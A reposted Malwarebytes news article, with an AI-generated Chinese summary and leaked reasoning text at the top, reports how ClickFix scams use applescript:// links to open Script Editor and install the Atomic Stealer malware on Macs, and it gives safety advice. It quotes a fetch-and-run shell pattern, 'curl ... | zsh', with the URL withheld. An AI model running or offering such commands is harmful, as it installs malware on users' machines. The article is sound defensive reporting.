ClickFix finds a new way to infect Macs
嗯,用户让我总结这篇文章,控制在100字以内,而且不需要用“文章内容总结”这样的开头。首先,我需要快速浏览文章,抓住主要信息。 文章讲的是ClickFix这个钓鱼攻击手段,之前是让用户在终端输入命令,现在改用苹果脚本链接。这样用户点击按钮就能自动打开脚本编辑器,运行恶意脚本下载Atomic Stealer。文章还提到如何防范这些攻击,比如不要轻易运行脚本、使用安全软件等。 接下来,我需要把这些要点浓缩成一句话。要包括ClickFix的变化、攻击方式、恶意软件以及防范建议。确保不超过100字。 可能的结构是:ClickFix从终端命令转向苹果脚本,诱骗用户运行恶意脚本下载Atomic Stealer,提醒用户不要轻易运行未知来源的代码,并保持系统更新和使用安全软件。 检查一下字数,确保在限制内。这样总结应该能准确传达文章的核心内容。 </think> ClickFix钓鱼攻击通过诱导用户点击按钮运行预设脚本下载恶意软件Atomic Stealer,取代了过去要求用户在终端输入命令的方式。攻击者利用"释放磁盘空间"等诱饵吸引用户点击,并通过苹果脚本链接自动打开Script Editor运行隐藏的恶意代码。提醒用户谨慎处理未知来源的脚本和命令,并保持系统更新以防范此类攻击。 2026-4-10 15:2:18 Author: www.malwarebytes.com(查看原文) 阅读量:5 收藏

ClickFix campaigns are looking for alternatives now that many Mac users have been made aware of the dangers of pasting certain commands into Terminal.

Researchers found that ClickFix has kept the same social engineering playbook but completely sidestepped Terminal by using the applescript:// URL scheme to auto‑open Script Editor with a ready‑to‑run script that pulls Atomic Stealer.

ClickFix is a social engineering method that tricks users into infecting their own device with malware. Users are instructed to run specific commands that download malware, usually an infostealer.

The attackers replaced “copy, paste into Terminal” with “just click this button and run a script Apple prepared for you.”

The lure is the ever-popular “Reclaim Disk Space on your Mac.” One of the search results using the old method looked like this:

Classic ClickFix method using Terminal
Classic ClickFix method using Terminal

Running an obfuscated curl command in your Terminal is a bad idea at all times. But what follows is equally dangerous, and I expect users will be more likely to follow the flow.

The new method looks more like this:

New ClickFix method using Script Editor
New ClickFix method using Script Editor

The key difference lies in how execution is initiated: Instead of asking you to paste scary commands, the site offers a one‑click “Apple script” that claims to clean your Mac and even shows a fake “Freed 24.7 GB” dialog.

Under the hood, the applescript:// deep link opens Script Editor with a pre‑filled “maintenance” script. But the script’s real job is do shell script "curl -kSsfL <obfuscated URL> | zsh".  This effectively pulls a second‑stage script, which decodes another script, which finally downloads helper (an Atomic Stealer variant) and runs it.

Atomic Stealer, also known as AMOS, is a popular infostealer for macOS. But Atomic Stealer is just the current payload. Tomorrow it could be MacSync, Infiniti, or something new.

In the end it’s still a self-inflicted infection, since the user is granting every permission by clicking through dialogs and running the script.

How to stay safe

Reportedly, ClickFix was responsible for more than half of all malware loader activity in 2025. One of the reasons for its success is that the campaigns kept adding—and are continuing to add—new methods to trick users, along with different commands to avoid detection.

Users of macOS Tahoe will be warned against using these scripts if the OS is up to date (26.4 or later).

So, with ClickFix running rampant and inventing new methods all the time, it’s important to be aware, careful, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?


We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

About the author

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.


文章来源: https://www.malwarebytes.com/blog/news/2026/04/clickfix-finds-new-way-to-infect-macs
如有侵权请联系:admin#unsafe.sh